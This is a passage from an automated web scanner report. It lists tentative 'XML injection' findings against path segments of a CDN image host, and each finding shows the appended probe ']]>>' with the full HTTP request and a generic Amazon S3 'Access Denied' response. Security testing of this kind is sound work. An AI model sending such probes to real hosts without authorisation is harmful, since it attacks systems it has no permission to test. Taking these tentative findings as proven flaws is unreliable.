The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff9933-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 54351A929372EBFD
x-amz-id-2: 3bA+fOGAgkCGGNuKDs6raSs5DQTk5PoRfTuddtAcr95Sy7XAGxFFwC45yCsBi1yD
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:15 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: b32b414bda2e429016f4fafaed52e8d00bd140a5989d763439bf6eaed29077c2e947dbbb45bc0eed
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>54351A929372EBFD</RequestId><HostId>3bA+fOGAgkCGGNuKDs6raSs5DQTk5PoRfTuddtAcr95Sy7XAGx
...[SNIP]...

8.160. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff9933-663333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 3942FA9D8FC44ADB
x-amz-id-2: VlTh353z771ubD9S5HTcRPWJgENq38MD1H62Py42RLn33wABfZrTUMX05sCGqmHj
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:23 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 588a16edcdb2a4762bb3de9d22a9b4ffaf4c952629eaf5eac715aea1e33262e42b3b5ea225de9cc0
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>3942FA9D8FC44ADB</RequestId><HostId>VlTh353z771ubD9S5HTcRPWJgENq38MD1H62Py42RLn33wABfZ
...[SNIP]...

8.161. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-663333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 0C9D319587600023
x-amz-id-2: eG8TJdB5KyFYmkK7ww1lbikpy8Q8eFxF5/3/XThqoQiQD50Vbk9veBYs6wf1qHfG
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:36:27 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: c5db54f39efce5f53edf6e5cce3eb18391c535bd5f784695acd5aa021f33062027a0d3511310e1b9
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>0C9D319587600023</RequestId><HostId>eG8TJdB5KyFYmkK7ww1lbikpy8Q8eFxF5/3/XThqoQiQD50Vbk
...[SNIP]...

8.162. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff9933-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A4E562E4C07FF040
x-amz-id-2: 101WhJGv8nJP9i38RpwTUrc3+UZ0mYjY351bqmFuZ1MjsvrIYKAg0AUnpe6eysZp
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ca33f5bab14fe570918a2923f69d769061549eef7a37b59adec7c96b46d194b3725fc5c33f9435dc
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A4E562E4C07FF040</RequestId><HostId>101WhJGv8nJP9i38RpwTUrc3+UZ0mYjY351bqmFuZ1MjsvrIYK
...[SNIP]...

8.163. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff9933-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 11BEF973323AEFE2
x-amz-id-2: DFRrTdYP+HZyyyyU9ejWEEqZhPbzaZPuP37s6FtB0grIbGNgg1xSIjMIXKqVfcEh
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 69299366edc023beea36cd88f71201c1b3ad2780df58a7515a7fbd4b0dc5a2c8120eda8fe26a5354
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>11BEF973323AEFE2</RequestId><HostId>DFRrTdYP+HZyyyyU9ejWEEqZhPbzaZPuP37s6FtB0grIbGNgg1
...[SNIP]...

8.164. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff9933-993333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 702A9A93AFEA7302
x-amz-id-2: eszqLEAoyiv9UjpAdtnfaq4XM6XmpZ5IK4+EJS/leicejDFX6+rN0Ds4e/dwzOie
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 014f8022f642692b4c8d05ce8ab252f39ac11b97ec2b7ea4b18a9ef8b746184e46949fd1d4e05f96
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>702A9A93AFEA7302</RequestId><HostId>eszqLEAoyiv9UjpAdtnfaq4XM6XmpZ5IK4+EJS/leicejDFX6+
...[SNIP]...

8.165. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-993333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: AD400BD090E77D6A
x-amz-id-2: 7ROlnQPie528jHIsIR/ZdoMpIQwFJzN5HMHeCLqJEkXNuLmdClyqm3L+VEs31vc9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:57 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: d76abba3561071c216a0b5d963ad46d631f76429679ad4ce59207abd110cf26f592451eb0c8be4dd
Via: 1.0 e1f0363dccfdcada535eb4fd7c2d2e27.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>AD400BD090E77D6A</RequestId><HostId>7ROlnQPie528jHIsIR/ZdoMpIQwFJzN5HMHeCLqJEkXNuLmdCl
...[SNIP]...

8.166. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff9933-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C0C99A08ECB813B2
x-amz-id-2: L2nKgc0FzmayxGyqwoIap+megwuJmdxl81IItInwmhEbTh1cX5MN6KuyqjYarrFD
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 458d16d38bd018065b65af5c66bb9bb1c2ecbf245e7b44c5f636fd31702f5f7a2b9d87983662af3f
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C0C99A08ECB813B2</RequestId><HostId>L2nKgc0FzmayxGyqwoIap+megwuJmdxl81IItInwmhEbTh1cX5
...[SNIP]...

8.167. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff9933-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 39E9ED6266877FC1
x-amz-id-2: fRwtA+/YkpPo8Ap6V9M7jr72tGdaljSbAnInv21Qr5DxWqn/KzSGMrPHjl0QJktR
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: bc9cbb205c53d54c9d826de25823f4dbc0dc8f2d17ccdc245221164b049831adc265e191d039ba9f
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>39E9ED6266877FC1</RequestId><HostId>fRwtA+/YkpPo8Ap6V9M7jr72tGdaljSbAnInv21Qr5DxWqn/Kz
...[SNIP]...

8.168. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers]]>>/circle-multipoint-ff9933-cc3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: B04858BD57A49A40
x-amz-id-2: s8Dl3oNWpV4bkAVFUqxkZLqiU0AQAu5JaZHCgW9uR+AEWaMHITze+DPNVaJTb4J9
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7a7927f264a2cf486d7b7cc152f6e894ef255e0a7e624462fec772d63af2677e1f774a7799e8a088
Via: 1.0 fb63ddec72f5ddb885466333fe83d86e.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>B04858BD57A49A40</RequestId><HostId>s8Dl3oNWpV4bkAVFUqxkZLqiU0AQAu5JaZHCgW9uR+AEWaMHIT
...[SNIP]...

8.169. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-cc3333-17px.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 1B198A299BC7E670
x-amz-id-2: u7KxoN/sXgEBwhpyvz2kUs6eRGbjD8EW5LrkY3gzzkQaKvfVoQXmmF+txaUnoGsj
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:03 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: cdfdfadf40ec9a0823cca9d154d7e4fe89d2c8826ffe54c93f0b728784fbc542f95ee98a77c6d0eb
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1B198A299BC7E670</RequestId><HostId>u7KxoN/sXgEBwhpyvz2kUs6eRGbjD8EW5LrkY3gzzkQaKvfVoQ
...[SNIP]...

8.170. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/markers/circle-multipoint-ff9933-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A8469E087FDA95BE
x-amz-id-2: CO2PxPtvD32w2asorRyDcm/6pHUggyix0ZRuNGC6CHxYBJMQhOlEew57bSclSH5m
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: ead64f90e8cb9d7ab44654b99c8d870454243a79c119d1000d69268bdcd09106b474a23a39e679b0
Via: 1.0 6b83d00d13ba12519446ea215e3bbaf7.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A8469E087FDA95BE</RequestId><HostId>CO2PxPtvD32w2asorRyDcm/6pHUggyix0ZRuNGC6CHxYBJMQhO
...[SNIP]...

8.171. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/markers/circle-multipoint-ff9933-ff3333-17px.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: C0B451D1D90E1883
x-amz-id-2: Yjy4vAh016+Pt+zw5RD5h/5rlmx30Or1RXo9BQUpQCZhZ/He/bIVIEsKOeX+b52E
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 9818755ba6a3a7bf5e81f7e3374ac8c736aac95e616964926261d4b9b376c922f3460494416c4d66
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>C0B451D1D90E1883</RequestId><HostId>Yjy4vAh016+Pt+zw5RD5h/5rlmx30Or1RXo9BQUpQCZhZ/He/b
...[SNIP]...

8.172. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/markers/circle-multipoint-ff9933-ff3333-17px.png

Issue detail

